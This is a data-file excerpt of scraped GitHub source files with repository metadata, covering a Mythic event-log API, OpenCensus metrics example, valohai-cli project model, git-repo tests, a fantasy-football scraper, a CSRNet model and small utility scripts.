hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3b2a99b7dc2c09c8596c0f28ca4318b474d9d158
| 11,696
|
py
|
Python
|
mythic-docker/app/api/event_message_api.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2021-01-28T19:35:46.000Z
|
2021-04-08T12:01:48.000Z
|
mythic-docker/app/api/event_message_api.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | null | null | null |
mythic-docker/app/api/event_message_api.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2021-06-23T18:59:18.000Z
|
2021-08-20T00:06:49.000Z
|
from app import mythic, db_objects
from sanic.response import json
from sanic_jwt.decorators import scoped, inject_user
import app.database_models.model as db_model
from sanic.exceptions import abort
from math import ceil
from peewee import fn
from app.api.siem_logger import log_to_siem
async def get_old_event_alerts(user):
try:
# query = await db_model.operator_query()
# operator = await db_objects.get(query, username=user['username'])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
event_query = await db_model.operationeventlog_query()
alerts = await db_objects.execute(
event_query.where(
(db_model.OperationEventLog.operation == operation)
& (db_model.OperationEventLog.deleted == False)
& (db_model.OperationEventLog.level != "info")
& (db_model.OperationEventLog.resolved == False)
)
)
total_alerts = []
for a in alerts:
total_alerts.append({"id": a.id})
return {"status": "success", "alerts": total_alerts}
except Exception as e:
return {"status": "error", "error": str(e)}
@mythic.route(mythic.config["API_BASE"] + "/event_message", methods=["GET"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def get_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
try:
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
event_query = await db_model.operationeventlog_query()
alerts = await db_objects.execute(
event_query.where(
(db_model.OperationEventLog.operation == operation)
& (db_model.OperationEventLog.deleted == False)
)
)
total_alerts = []
for a in alerts:
total_alerts.append(a.to_json())
return json({"status": "success", "alerts": total_alerts})
except Exception as e:
print(str(e))
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message", methods=["POST"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def add_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot send messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
if "message" not in data:
return json({"status": "error", "error": "message is required"})
if "level" not in data:
data["level"] = "info"
if data["level"] not in ["info", "warning"]:
return json({"status": "error", "error": "level not recognized"})
msg = await db_objects.create(
db_model.OperationEventLog,
operator=operator,
operation=operation,
message=data["message"].encode('unicode-escape'),
level=data["level"],
)
await log_to_siem(msg.to_json(), mythic_object="eventlog_new")
return json({"status": "success", **msg.to_json()})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/<eid:int>", methods=["PUT"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def edit_event_message(request, user, eid):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot edit messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
query = await db_model.operationeventlog_query()
msg = await db_objects.get(query, id=eid, operation=operation)
if "message" not in data and "resolved" not in data:
return json(
{"status": "error", "error": "message or resolve status is required"}
)
else:
if (
user["admin"]
or msg.operator == operator
or operation.name in user["admin_operations"]
):
if "resolved" in data:
msg.resolved = data["resolved"]
if "message" in data:
msg.message = data["message"].encode('unicode-escape')
if "level" in data and data["level"] in ["info", "warning"]:
msg.level = data["level"]
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
await db_objects.update(msg)
else:
if "resolved" in data and data["resolved"] != msg.resolved:
msg.resolved = data["resolved"]
await db_objects.update(msg)
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
else:
return json(
{
"status": "error",
"error": "You must be the author of the message, a global admin, or operation admin to edit that message",
}
)
return json({"status": "success", **msg.to_json()})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/delete", methods=["POST"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def remove_event_messagse(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot remove messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
query = await db_model.operationeventlog_query()
not_authorized = False
for e in data["messages"]:
# given an array of message ids to delete, try to delete them all
msg = await db_objects.get(query, id=e, operation=operation)
if (
user["admin"]
or msg.operator == operator
or operation.name in user["admin_operations"]
):
msg.deleted = True
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
await db_objects.update(msg)
else:
not_authorized = True
if not_authorized:
return json(
{
"status": "error",
"error": "Failed to delete some messages since you're not authorized",
}
)
else:
return json({"status": "success"})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/search", methods=["POST"])
@inject_user()
@scoped(
["auth:user", "auth:apitoken_user"], False
) # user or user-level api token are ok
async def search_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
try:
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
query = await db_model.operationeventlog_query()
except Exception as e:
return json(
{
"status": "error",
"error": "failed to find that file browsing object in your current operation",
}
)
try:
data = request.json
count = await db_objects.count(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
).distinct()
)
if "page" not in data:
# allow a blanket search to still be performed
responses = await db_objects.execute(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
).distinct()
)
data["page"] = 1
data["size"] = count
else:
if (
"page" not in data
or "size" not in data
or int(data["size"]) <= 0
or int(data["page"]) <= 0
):
return json(
{
"status": "error",
"error": "size and page must be supplied and be greater than 0",
}
)
data["size"] = int(data["size"])
data["page"] = int(data["page"])
if data["page"] * data["size"] > count:
data["page"] = ceil(count / data["size"])
if data["page"] == 0:
data["page"] = 1
responses = await db_objects.execute(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
)
.distinct()
.paginate(data["page"], data["size"])
)
output = []
for r in responses:
rjson = r.to_json()
output.append(rjson)
return json(
{
"status": "success",
"output": output,
"total_count": count,
"page": data["page"],
"size": data["size"],
}
)
except Exception as e:
print(e)
return json({"status": "error", "error": str(e)})
| 39.918089
| 134
| 0.542322
|
355c729544b9a56d9817c179a4b4657efd8ca8a1
| 2,266
|
py
|
Python
|
contrib/opencensus-ext-azure/examples/metrics/sum.py
|
Flared/opencensus-python
|
e2535e688a50c7a06be8af93ca3b987d387da605
|
[
"Apache-2.0"
] | 650
|
2017-07-09T02:08:10.000Z
|
2022-03-22T20:39:54.000Z
|
contrib/opencensus-ext-azure/examples/metrics/sum.py
|
Flared/opencensus-python
|
e2535e688a50c7a06be8af93ca3b987d387da605
|
[
"Apache-2.0"
] | 735
|
2017-07-26T01:15:16.000Z
|
2022-03-29T20:17:20.000Z
|
contrib/opencensus-ext-azure/examples/metrics/sum.py
|
Flared/opencensus-python
|
e2535e688a50c7a06be8af93ca3b987d387da605
|
[
"Apache-2.0"
] | 256
|
2017-07-24T18:29:15.000Z
|
2022-03-15T15:33:03.000Z
|
# Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from opencensus.ext.azure import metrics_exporter
from opencensus.stats import aggregation as aggregation_module
from opencensus.stats import measure as measure_module
from opencensus.stats import stats as stats_module
from opencensus.stats import view as view_module
from opencensus.tags import tag_map as tag_map_module
stats = stats_module.stats
view_manager = stats.view_manager
stats_recorder = stats.stats_recorder
REQUEST_MEASURE = measure_module.MeasureFloat("Requests",
"number of requests",
"requests")
NUM_REQUESTS_VIEW = view_module.View("Number of Requests",
"number of requests",
["url"],
REQUEST_MEASURE,
aggregation_module.SumAggregation())
def main():
# Enable metrics
# Set the interval in seconds in which you want to send metrics
# TODO: you need to specify the instrumentation key in a connection string
# and place it in the APPLICATIONINSIGHTS_CONNECTION_STRING
# environment variable.
exporter = metrics_exporter.new_metrics_exporter()
view_manager.register_exporter(exporter)
view_manager.register_view(NUM_REQUESTS_VIEW)
mmap = stats_recorder.new_measurement_map()
tmap = tag_map_module.TagMap()
tmap.insert("url", "http://example.com")
for i in range(100):
print(i)
mmap.measure_int_put(REQUEST_MEASURE, i)
mmap.record(tmap)
time.sleep(1)
print("Done recording metrics")
if __name__ == "__main__":
main()
| 35.968254
| 78
| 0.682259
|
7148797b4fa13c65c6b747f8df9f828115e90104
| 5,261
|
py
|
Python
|
valohai_cli/models/project.py
|
valohai/valohai-cli
|
d45f4d8d3b39e803730c070a40f8d2ddfbfb661c
|
[
"MIT"
] | 11
|
2017-11-06T16:31:46.000Z
|
2020-10-26T09:55:12.000Z
|
valohai_cli/models/project.py
|
valohai/valohai-cli
|
d45f4d8d3b39e803730c070a40f8d2ddfbfb661c
|
[
"MIT"
] | 147
|
2017-04-06T09:46:11.000Z
|
2022-03-10T16:24:15.000Z
|
valohai_cli/models/project.py
|
valohai/valohai-cli
|
d45f4d8d3b39e803730c070a40f8d2ddfbfb661c
|
[
"MIT"
] | 4
|
2017-04-16T16:00:51.000Z
|
2021-07-05T11:36:36.000Z
|
import io
import os
from typing import List, Optional, TextIO, Union
import valohai_yaml
from click import BadParameter
from valohai_yaml.objs.config import Config
from valohai_cli.api import request
from valohai_cli.exceptions import APIError, InvalidConfig, NoExecution
from valohai_cli.git import get_file_at_commit
class Project:
is_remote = False
def __init__(self, data: dict, directory: str) -> None:
self.data = data
if not os.path.isdir(directory):
raise ValueError(f"Invalid directory: {directory}")
self.directory = directory
self._commit_list: Optional[List[dict]] = None
@property
def id(self) -> str:
return str(self.data['id'])
@property
def name(self) -> str:
return str(self.data['name'])
def get_config(self, commit_identifier: Optional[str] = None) -> Config:
"""
Get the `valohai_yaml.Config` object from the current working directory,
or a given commit.
:param commit_identifier: Hexadecimal commit identifier; optional.
:return: valohai_yaml.Config
"""
if not commit_identifier: # Current working directory
filename = self.get_config_filename()
with open(filename) as infp:
return self._parse_config(infp, filename)
else: # Arbitrary commit
filename = f'{commit_identifier}:valohai.yaml'
directory = self.directory
config_bytes = get_file_at_commit(directory, commit_identifier, 'valohai.yaml')
config_sio = io.StringIO(config_bytes.decode('utf-8'))
return self._parse_config(config_sio, filename)
def _parse_config(self, config_fp: TextIO, filename: str = '<config file>') -> Config:
try:
return valohai_yaml.parse(config_fp)
except OSError as err:
raise InvalidConfig(f'Could not read {filename}') from err
except valohai_yaml.ValidationErrors as ves:
raise InvalidConfig('{filename} is invalid ({n} errors); see `vh lint`'.format(
filename=filename,
n=len(ves.errors),
))
def get_config_filename(self) -> str:
return os.path.join(self.directory, 'valohai.yaml')
def get_execution_from_counter(
self,
counter: Union[int, str],
params: Optional[dict] = None,
) -> dict:
if isinstance(counter, str):
counter = counter.lstrip('#')
if not (counter.isdigit() or counter == 'latest'):
raise BadParameter(
f'{counter} is not a valid counter value; it must be an integer or "latest"',
)
try:
data = request(
method='get',
url=f'/api/v0/executions/{self.id}:{counter}/',
params=(params or {}),
).json()
assert isinstance(data, dict)
return data
except APIError as ae:
if ae.response.status_code == 404:
raise NoExecution(f'Execution #{counter} does not exist')
raise
def load_commit_list(self) -> List[dict]:
"""
Get a list of non-adhoc commits, newest first.
"""
if self._commit_list is None:
commits: List[dict] = list(request(
method='get',
url='/api/v0/commits/',
params={
'project': self.id,
'adhoc': 'false',
'limit': 9000,
},
).json()['results'])
commits.sort(key=lambda c: str(c['commit_time']), reverse=True)
self._commit_list = commits
return self._commit_list
def resolve_commit(self, commit_identifier: Optional[str] = None) -> dict:
"""
Resolve a commit identifier to a commit dict.
:raises KeyError: if an explicitly named identifier is not found
:raises IndexError: if there are no commits
"""
commits = self.load_commit_list()
if commit_identifier:
by_identifier = {c['identifier']: c for c in commits}
return by_identifier[commit_identifier]
newest_commit = sorted(
(c for c in commits if not c.get('adhoc')),
key=lambda c: str(c['commit_time']),
reverse=True,
)[0]
assert newest_commit['identifier']
return newest_commit
def load_full_commit(self, identifier: Optional[str] = None) -> dict:
"""
Load the commit object including config data (as a dict) from the Valohai host for the given commit identifier.
:param identifier: Identifier; None to use the latest commit on the server.
"""
for commit in self.load_commit_list():
if commit.get('adhoc'):
continue
if not identifier or commit['identifier'] == identifier:
data = request(method='get', url=commit['url'], params={'include': 'config'}).json()
assert isinstance(data, dict)
return data
raise ValueError(f'No commit found for commit {identifier}')
def __str__(self) -> str:
return self.name
| 36.534722
| 119
| 0.588101
|
8d9b5f00362d8e0186852c8c1afba18e8792d44c
| 2,694
|
py
|
Python
|
tests/test_git_command.py
|
Orchild/git-repo
|
a46bf7dc2af111ae4a663d61ed06dc90ddfb8068
|
[
"Apache-2.0"
] | null | null | null |
tests/test_git_command.py
|
Orchild/git-repo
|
a46bf7dc2af111ae4a663d61ed06dc90ddfb8068
|
[
"Apache-2.0"
] | null | null | null |
tests/test_git_command.py
|
Orchild/git-repo
|
a46bf7dc2af111ae4a663d61ed06dc90ddfb8068
|
[
"Apache-2.0"
] | 2
|
2019-08-12T22:30:01.000Z
|
2019-10-27T10:06:06.000Z
|
# -*- coding:utf-8 -*-
#
# Copyright 2019 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittests for the git_command.py module."""
from __future__ import print_function
import re
import unittest
import git_command
class GitCallUnitTest(unittest.TestCase):
"""Tests the _GitCall class (via git_command.git)."""
def test_version_tuple(self):
"""Check git.version_tuple() handling."""
ver = git_command.git.version_tuple()
self.assertIsNotNone(ver)
# We don't dive too deep into the values here to avoid having to update
# whenever git versions change. We do check relative to this min version
# as this is what `repo` itself requires via MIN_GIT_VERSION.
MIN_GIT_VERSION = (2, 10, 2)
self.assertTrue(isinstance(ver.major, int))
self.assertTrue(isinstance(ver.minor, int))
self.assertTrue(isinstance(ver.micro, int))
self.assertGreater(ver.major, MIN_GIT_VERSION[0] - 1)
self.assertGreaterEqual(ver.micro, 0)
self.assertGreaterEqual(ver.major, 0)
self.assertGreaterEqual(ver, MIN_GIT_VERSION)
self.assertLess(ver, (9999, 9999, 9999))
self.assertNotEqual('', ver.full)
class UserAgentUnitTest(unittest.TestCase):
"""Tests the UserAgent function."""
def test_smoke_os(self):
"""Make sure UA OS setting returns something useful."""
os_name = git_command.user_agent.os
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^[^ ]+$', os_name)
self.assertIsNotNone(m)
def test_smoke_repo(self):
"""Make sure repo UA returns something useful."""
ua = git_command.user_agent.repo
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^git-repo/[^ ]+ ([^ ]+) git/[^ ]+ Python/[0-9.]+', ua)
self.assertIsNotNone(m)
def test_smoke_git(self):
"""Make sure git UA returns something useful."""
ua = git_command.user_agent.git
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^git/[^ ]+ ([^ ]+) git-repo/[^ ]+', ua)
self.assertIsNotNone(m)
| 34.101266
| 77
| 0.702673
|
0985cf75af6e813b5d41f1b47bdc93ca1762a436
| 1,782
|
py
|
Python
|
tests/test_html.py
|
BigSmitty72/FFballPython
|
8dd15d2753ce9df59b6e4393629eb065f8e5e304
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_html.py
|
BigSmitty72/FFballPython
|
8dd15d2753ce9df59b6e4393629eb065f8e5e304
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_html.py
|
BigSmitty72/FFballPython
|
8dd15d2753ce9df59b6e4393629eb065f8e5e304
|
[
"BSD-3-Clause"
] | null | null | null |
import mechanize
from bs4 import BeautifulSoup, SoupStrainer
import re
league = "70928"
season = "2016"
def standings_html():
url = UrlConstants.STANDINGS_URL.format(league, season)
return get_html(url)
def standings_detail_html():
url = UrlConstants.STANDINGS_URL.format(league, season)
return get_html(url)
def roster_html(team):
url = UrlConstants.ROSTER_URL.format(league, team, season)
return get_html(url)
def free_agent_html(team):
url = UrlConstants.FA_URL.format(team)
return self.get_html(url)
def transaction_html():
url = UrlConstants.TRANSACTIONS_URL.format(self.league)
return self.get_html(url)
def settings_html():
url = UrlConstants.TRANSACTIONS_URL.format(self.league)
return self.get_html(url)
def get_html(url):
browser = mechanize.Browser()
browser.open(url)
return browser.response().read()
class UrlConstants:
STANDINGS_URL = 'http://games.espn.go.com/ffl/standings?leagueId={0}&seasonId={1}'
SCOREBOARD_URL = 'http://games.espn.go.com/ffl/scoreboard?leagueId={0}&seasonId={1}'
ROSTER_URL = 'http://games.espn.go.com/ffl/clubhouse?leagueId={0}&teamId={1}&seasonId={2}'
FA_URL = 'http://games.espn.go.com/ffl/freeagency?leagueId={0}&teamId={1}'
SCORING_URL = 'http://games.espn.go.com/ffl/}eaders?leagueId={0}&teamId={1}&scoringPeriodId={2}'
WAIVER_URL = 'http://games.espn.go.com/ffl/tools/waiverorder?leagueId={0}'
TRANSACTIONS_URL = 'http://games.espn.go.com/ffl/tools/transactioncounter?leagueId={0}'
SETTINGS_URL = 'http://games.espn.go.com/ffl/leaguesetup/settings?leagueId={0}'
ROSTER_URL = 'http://games.espn.go.com/ffl/clubhouse?leagueId={0}&teamId={1}&seasonId={2}'
only_tags_with_id_link2 = SoupStrainer(id=re.compile("playertable_"))
| 29.213115
| 100
| 0.723906
|
511a33391498ae1937a069c4b5afa80b4a34bf9e
| 3,012
|
py
|
Python
|
models/SCC_Model/CSRNet.py
|
Yuuchuin/C3_V2
|
92a5edbc2c2b3452c5f57e74f928591192293e81
|
[
"MIT"
] | 1
|
2021-01-29T09:43:05.000Z
|
2021-01-29T09:43:05.000Z
|
models/SCC_Model/CSRNet.py
|
Yuuchuin/C3_V2
|
92a5edbc2c2b3452c5f57e74f928591192293e81
|
[
"MIT"
] | null | null | null |
models/SCC_Model/CSRNet.py
|
Yuuchuin/C3_V2
|
92a5edbc2c2b3452c5f57e74f928591192293e81
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
from torchvision import models
import torch.nn.functional as F
from .SCC_BaseModel import SCC_BaseModel
from torch import optim
from torch.optim.lr_scheduler import StepLR
class csrnet(nn.Module):
def __init__(self, load_weights=False):
super(csrnet, self).__init__()
self.seen = 0
self.frontend_feat = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512]
self.backend_feat = [512, 512, 512,256,128,64]
self.frontend = make_layers(self.frontend_feat)
self.backend = make_layers(self.backend_feat,in_channels = 512,dilation = True)
self.output_layer = nn.Conv2d(64, 1, kernel_size=1)
if not load_weights:
mod = models.vgg16(pretrained = True)
self._initialize_weights()
self.frontend.load_state_dict(mod.features[0:23].state_dict())
def forward(self,x):
shape = x.shape[-2:]
x = self.frontend(x)
x = self.backend(x)
x = self.output_layer(x)
x = F.interpolate(x, shape)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.01)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def make_layers(cfg, in_channels = 3,batch_norm=False,dilation = False):
if dilation:
d_rate = 2
else:
d_rate = 1
layers = []
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=d_rate,dilation = d_rate)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
class CSRNet(SCC_BaseModel):
def __init__(self, dataloader, cfg, dataset_cfg, pwd):
super(CSRNet, self).__init__(dataloader, cfg, dataset_cfg, pwd)
self.net = csrnet()
self.optimizer = optim.Adam(self.net.parameters(), lr=cfg.LR, weight_decay=1e-4)
# self.optimizer = optim.SGD(self.net.parameters(), cfg.LR, momentum=0.95,weight_decay=5e-4)
self.scheduler = StepLR(self.optimizer, step_size=cfg.NUM_EPOCH_LR_DECAY, gamma=cfg.LR_DECAY)
if len(self.gpus) == 1:
self.net = self.net.cuda()
elif len(self.gpus) > 1:
self.net = torch.nn.DataParallel(self.net, device_ids=self.gpus).cuda()
if len(self.gpus) >= 1:
self.loss_mse_fn = nn.MSELoss().cuda()
if __name__ == '__main__':
dummy = torch.randn([2,3,512,512]).cuda()
model = csrnet().cuda()
pre = model(dummy)
print(pre.shape)
| 35.857143
| 101
| 0.597278
|
1f578b742ccd924cc07a04a34fc4894fa54d766b
| 399
|
py
|
Python
|
Constants.py
|
r-soltani/BreachAnalyzer
|
15c1cde1e068e4f1e0d77393e82a5034bb3d045b
|
[
"Apache-2.0"
] | null | null | null |
Constants.py
|
r-soltani/BreachAnalyzer
|
15c1cde1e068e4f1e0d77393e82a5034bb3d045b
|
[
"Apache-2.0"
] | null | null | null |
Constants.py
|
r-soltani/BreachAnalyzer
|
15c1cde1e068e4f1e0d77393e82a5034bb3d045b
|
[
"Apache-2.0"
] | null | null | null |
# data retreival parameters
# number of days from the incident date
STOCK_PRICE_TARGET_DAYS_DELTA_BEFORE = 7
# number of days prior to incident date
STOCK_PRICE_TARGET_DAYS_DELTA_AFTER = 14
STOCK_PRICE_TARGET_DAYS_DELTA_INTERVAL = 1
# price change reference (NASDAQ)
NASDAQ_TICKER = "NDAQ"
# AlphaAdvantage API Key
ALPHA_ADVANTAGE_API_KEY = "KEY GOES HERE"
VERBOSE = False
# Graph parameters
| 19.95
| 42
| 0.807018
|
72840d2036585d7b83b2266ffabf1bb5ba349211
| 1,693
|
py
|
Python
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 1
|
2022-01-20T03:11:05.000Z
|
2022-01-20T06:53:39.000Z
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
# coding=utf-8
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The config of the evaluate service."""
davinci_environment_type = "ATLAS200DK" # Evb , ATLAS200DK or Atlas300
ddk_host_ip = "192.168.0.1"
listen_port = 8888
# if your environment_type is ATLAS200DK, the following parameters should be configed, if not, just ignore it
ddk_user_name = "ly"
atlas_host_ip = "192.168.0.2"
| 43.410256
| 109
| 0.692853
|
34a58fce5e908f69fe01dc9307aab161407d7cb3
| 1,694
|
py
|
Python
|
script/upload-checksums.py
|
rprichard/atom-shell
|
73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5
|
[
"MIT"
] | 2
|
2020-01-05T10:34:24.000Z
|
2020-01-05T10:40:00.000Z
|
script/upload-checksums.py
|
rprichard/atom-shell
|
73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5
|
[
"MIT"
] | null | null | null |
script/upload-checksums.py
|
rprichard/atom-shell
|
73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5
|
[
"MIT"
] | 3
|
2015-04-19T04:09:08.000Z
|
2021-09-19T19:02:32.000Z
|
#!/usr/bin/env python
import argparse
import hashlib
import os
import tempfile
from lib.util import download, rm_rf, s3_config, s3put
DIST_URL = 'https://gh-contractor-zcbenz.s3.amazonaws.com/atom-shell/dist/'
def main():
args = parse_args()
url = DIST_URL + args.version + '/'
directory, files = download_files(url, get_files_list(args.version))
checksums = [
create_checksum('sha1', directory, 'SHASUMS.txt', files),
create_checksum('sha256', directory, 'SHASUMS256.txt', files)
]
bucket, access_key, secret_key = s3_config()
s3put(bucket, access_key, secret_key, directory,
'atom-shell/dist/{0}'.format(args.version), checksums)
rm_rf(directory)
def parse_args():
parser = argparse.ArgumentParser(description='upload sumsha file')
parser.add_argument('-v', '--version', help='Specify the version',
required=True)
return parser.parse_args()
def get_files_list(version):
return [
'node-{0}.tar.gz'.format(version),
'node.lib',
'x64/node.lib',
]
def download_files(url, files):
directory = tempfile.mkdtemp(prefix='atom-shell-tmp')
return directory, [
download(f, url + f, os.path.join(directory, f))
for f in files
]
def create_checksum(algorithm, directory, filename, files):
lines = []
for path in files:
h = hashlib.new(algorithm)
with open(path, 'r') as f:
h.update(f.read())
lines.append(h.hexdigest() + ' ' + os.path.relpath(path, directory))
checksum_file = os.path.join(directory, filename)
with open(checksum_file, 'w') as f:
f.write('\n'.join(lines) + '\n')
return checksum_file
if __name__ == '__main__':
import sys
sys.exit(main())
| 23.859155
| 75
| 0.673554
|
001e78bd7dfc2cf90a87ffacf21ef810e5b8aaf2
| 13,942
|
py
|
Python
|
network/anynet.py
|
pandamax/carrier-of-tricks-for-classification-pytorch
|
4c29088b113aea4b6308fb9935243276233f3763
|
[
"MIT"
] | 84
|
2020-06-24T16:01:22.000Z
|
2022-02-24T05:17:51.000Z
|
network/anynet.py
|
hoya012/bag-of-tricks-for-classification-pytorch
|
d788d7a4e5007da9c410bdd3ef7ce3766d2ba0cd
|
[
"MIT"
] | 1
|
2021-05-31T07:33:37.000Z
|
2021-05-31T07:33:37.000Z
|
network/anynet.py
|
